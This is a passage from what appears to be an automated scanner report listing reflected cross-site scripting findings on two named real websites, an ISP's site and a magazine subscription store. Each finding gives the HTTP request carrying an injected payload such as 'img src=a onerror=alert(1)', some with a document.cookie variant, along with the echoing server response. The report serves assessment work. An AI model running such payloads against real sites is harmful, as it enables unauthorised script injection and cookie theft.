The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b9d5"><img%20src%3da%20onerror%3dalert(1)>b1f32d3d153 was submitted in the REST URL parameter 1. This input was echoed as 7b9d5"><img src=a onerror=alert(1)>b1f32d3d153 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ServiceOfferings7b9d5"><img%20src%3da%20onerror%3dalert(1)>b1f32d3d153 HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/AboutUs
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:00:53 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: f5be6b6022b0df8893fa7c3238f292fd
Content-Length: 3322
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Cornerstone Communi
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Cornerstone Communications: High Speed Internet for Rural Maine: revisions for ServiceOfferings7b9d5"><img src=a onerror=alert(1)>b1f32d3d153 (RSS)" href="http://www.ccmaine.net/ServiceOfferings7b9d5">
...[SNIP]...

3.25. http://www.ccmaine.net/ServiceOfferings [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ccmaine.net
Path:	/ServiceOfferings

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bd4b3<img%20src%3da%20onerror%3dalert(1)>eeb57d3c8a0 was submitted in the REST URL parameter 1. This input was echoed as bd4b3<img src=a onerror=alert(1)>eeb57d3c8a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ServiceOfferingsbd4b3<img%20src%3da%20onerror%3dalert(1)>eeb57d3c8a0 HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/AboutUs
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:02:00 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: d9dd2b24ab396a9cd51f93f9de07b1c6
Content-Length: 3309
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Cornerstone Communi
...[SNIP]...
</a> : ServiceOfferingsbd4b3<img src=a onerror=alert(1)>eeb57d3c8a0</h2>
...[SNIP]...

3.26. http://www.ccmaine.net/TechnicalSupport [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ccmaine.net
Path:	/TechnicalSupport

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dcb9"><img%20src%3da%20onerror%3dalert(1)>b189af9dcd8 was submitted in the REST URL parameter 1. This input was echoed as 2dcb9"><img src=a onerror=alert(1)>b189af9dcd8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /TechnicalSupport2dcb9"><img%20src%3da%20onerror%3dalert(1)>b189af9dcd8 HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/ServiceArea
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:12 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: db4dc8c62428cdbb8e1c673cb517b83c
Content-Length: 3322
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Cornerstone Communi
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Cornerstone Communications: High Speed Internet for Rural Maine: revisions for TechnicalSupport2dcb9"><img src=a onerror=alert(1)>b189af9dcd8 (RSS)" href="http://www.ccmaine.net/TechnicalSupport2dcb9">
...[SNIP]...

3.27. http://www.ccmaine.net/TechnicalSupport [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ccmaine.net
Path:	/TechnicalSupport

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 976ce<img%20src%3da%20onerror%3dalert(1)>04d929e646d was submitted in the REST URL parameter 1. This input was echoed as 976ce<img src=a onerror=alert(1)>04d929e646d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /TechnicalSupport976ce<img%20src%3da%20onerror%3dalert(1)>04d929e646d HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/ServiceArea
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:02:07 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: 0feacbd9d3e1a0356e8dce1009bba5c4
Content-Length: 3309
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Cornerstone Communi
...[SNIP]...
</a> : TechnicalSupport976ce<img src=a onerror=alert(1)>04d929e646d</h2>
...[SNIP]...

3.28. http://www.ccmaine.net/a [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ccmaine.net
Path:	/a

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39a81"><img%20src%3da%20onerror%3dalert(1)>a60931266fc was submitted in the REST URL parameter 1. This input was echoed as 39a81"><img src=a onerror=alert(1)>a60931266fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /a39a81"><img%20src%3da%20onerror%3dalert(1)>a60931266fc HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/HomePage47337%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E61bf246dcf4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:00:39 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: 1bc6aa6f9451703197fd700f13b535a0
Content-Length: 3231
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Cornerstone Communi
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Cornerstone Communications: High Speed Internet for Rural Maine: revisions for a39a81"><img src=a onerror=alert(1)>a60931266fc (RSS)" href="http://www.ccmaine.net/a39a81">
...[SNIP]...

3.29. http://www.ccmaine.net/a [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ccmaine.net
Path:	/a

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5c9b5<img%20src%3da%20onerror%3dalert(1)>90bd250c825 was submitted in the REST URL parameter 1. This input was echoed as 5c9b5<img src=a onerror=alert(1)>90bd250c825 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /a5c9b5<img%20src%3da%20onerror%3dalert(1)>90bd250c825 HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/HomePage47337%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E61bf246dcf4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:57 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: 25c719ece4c4994f0429bcc010b9f443
Content-Length: 3219
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Cornerstone Communi
...[SNIP]...
</a> : a5c9b5<img src=a onerror=alert(1)>90bd250c825</h2>
...[SNIP]...

3.30. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Allure [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_Allure

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 5a5e0--><a%20b%3dc>29f0394fc82 was submitted in the REST URL parameter 5. This input was echoed as 5a5e0--><a b=c>29f0394fc82 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/5a5e0--><a%20b%3dc>29f0394fc82 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:48:56 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000ZJVVhrC3GuPc1UAALNDHphW:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:47 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329

                                               

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "5a5e0--><a b=c>29f0394fc82".
       Corrective Action:


                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.31. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ArchitecturalDigest [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_ArchitecturalDigest

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload c74af--><a%20b%3dc>3f1a901681d was submitted in the REST URL parameter 5. This input was echoed as c74af--><a b=c>3f1a901681d in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/c74af--><a%20b%3dc>3f1a901681d HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:48:09 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000EvQrtGaQnseDQXSXsw3brvD:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:00 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329

                                               

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "c74af--><a b=c>3f1a901681d".
       Corrective Action:


                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.32. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_BonAppetite [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_BonAppetite

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 5aab9--><a%20b%3dc>ec3af74862e was submitted in the REST URL parameter 5. This input was echoed as 5aab9--><a b=c>ec3af74862e in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/5aab9--><a%20b%3dc>ec3af74862e HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:48:19 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000Hd4iE0_k4lcDWx9pjCSs5NG:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:12 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329

                                               

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "5aab9--><a b=c>ec3af74862e".
       Corrective Action:


                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.33. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Brides [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_Brides

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload f6bac--><a%20b%3dc>5d7fa6913fa was submitted in the REST URL parameter 5. This input was echoed as f6bac--><a b=c>5d7fa6913fa in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/f6bac--><a%20b%3dc>5d7fa6913fa HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:48:53 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000uTCXbTRspSqOoVBK9qJuA9H:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:34 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329

                                               

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "f6bac--><a b=c>5d7fa6913fa".
       Corrective Action:


                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.34. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastPortfolio [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_CondeNastPortfolio

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 98a7b--><a%20b%3dc>e817f1477cd was submitted in the REST URL parameter 5. This input was echoed as 98a7b--><a b=c>e817f1477cd in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/98a7b--><a%20b%3dc>e817f1477cd HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:48:41 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000ir9fxFpqoVwr9kJNJc3rKUj:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:21 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329

                                               

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "98a7b--><a b=c>e817f1477cd".
       Corrective Action:


                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.35. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastTraveler [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_CondeNastTraveler

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 612e4--><a%20b%3dc>f2127e61cbe was submitted in the REST URL parameter 5. This input was echoed as 612e4--><a b=c>f2127e61cbe in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/612e4--><a%20b%3dc>f2127e61cbe HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:48:45 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000OqKWB-sdiPChufquVEMh4yT:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:25 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329

                                               

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "612e4--><a b=c>f2127e61cbe".
       Corrective Action:


                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.36. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Details [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_Details

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 7f2df--><a%20b%3dc>6ff088f3d15 was submitted in the REST URL parameter 5. This input was echoed as 7f2df--><a b=c>6ff088f3d15 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/7f2df--><a%20b%3dc>6ff088f3d15 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:49:42 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000Fo0eHqqs4Sg6z3MPvm8V-dQ:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:58:22 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329

                                               

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "7f2df--><a b=c>6ff088f3d15".
       Corrective Action:


                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.37. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ElegantBride [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_ElegantBride

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload e55b9--><a%20b%3dc>6bef17208f7 was submitted in the REST URL parameter 5. This input was echoed as e55b9--><a b=c>6bef17208f7 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/e55b9--><a%20b%3dc>6bef17208f7 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:49:00 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000LomihKZgw68WOC5OkKAIPsi:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:40 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329

                                               

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "e55b9--><a b=c>6bef17208f7".
       Corrective Action:


                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.38. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GQ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_GQ

Issue detail

